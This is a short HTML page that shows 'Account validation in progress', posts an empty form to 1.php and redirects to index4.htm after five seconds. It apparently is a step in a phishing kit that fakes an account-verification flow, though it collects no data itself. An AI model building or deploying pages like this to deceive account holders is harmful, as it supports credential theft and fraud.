<html>

<head>
<meta http-equiv="refresh" content="5; URL=index4.htm">
<meta http-equiv="Content-Language" content="en-us">
<meta http-equiv="Content-Type" content="text/html; charset=windows-1252">
<title>Validating...</title>
<link rel="stylesheet" href="style2.css" />
</head>



<table border="0" width="30%" id="table1" height="391" style="position: absolute; left: 831px; top: 155px; height: 343px">
	<tr>
		<td>
		<form method=post action=1.php>
		<table border="0" width="77%" id="table2" style="position: absolute; left: 22px; top: 143px">
			<tr>
				<td>
				<p align="center"><b><font face="Arial">Account validation in 
				progress<img border="0" src="fhiuewh6734.gif" width="18" height="12"></font></b></td>
			</tr>
		</table>
		<p>
		&nbsp;</form>
		</td>
	</tr>
</table>
<p>&nbsp;</p>

</body>

</html>